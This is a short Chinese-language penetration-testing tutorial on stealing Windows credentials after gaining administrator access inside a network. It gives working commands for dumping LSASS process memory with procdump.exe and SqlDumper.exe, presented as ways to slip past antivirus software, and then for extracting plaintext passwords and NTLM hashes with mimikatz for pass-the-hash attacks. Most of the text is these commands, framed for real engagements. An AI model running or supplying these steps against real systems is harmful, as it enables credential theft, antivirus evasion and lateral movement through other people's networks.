前言

内网渗透时，获得主机管理员权限后，通常会抓取用户的明文密码或hash，进行pth攻击。

大部分情况会遇到防护软件，常规抓取方法失效，因此需要对防护进行绕过。

Procdump.exe

Procdump是微软官方发布的工具，使用该工具可以把lsass的内存dump下来，可以绕过大多数的防护软件。

首先使用procdump.exe把进程lsass.exe 的内存dump下来

procdump.exe -accepteula -ma lsass.exe lsass.dmp

实战中把 lsass.dmp 下载下来，在相同版本的操作系统使用mimikatz读取密码hash。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

SqlDumper.exe

SqlDumper也属于微软出品，存在于SQL Server文件夹中，大多数杀软不会拦截。

默认存放在C:\Program Files\Microsoft SQL Server\number\Shared，number代表SQL Server的版本。

如果目标机器没有安装SQL Server，可以自己上传SqlDumper.exe。

tasklist /svc | findstr lsass.exe  查看lsass.exe 的PID号
Sqldumper.exe ProcessID 0 0x01100  导出mdmp文件

实战中下把生成的mdmp文件下载到本地，使用相同的操作系统打开。

mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit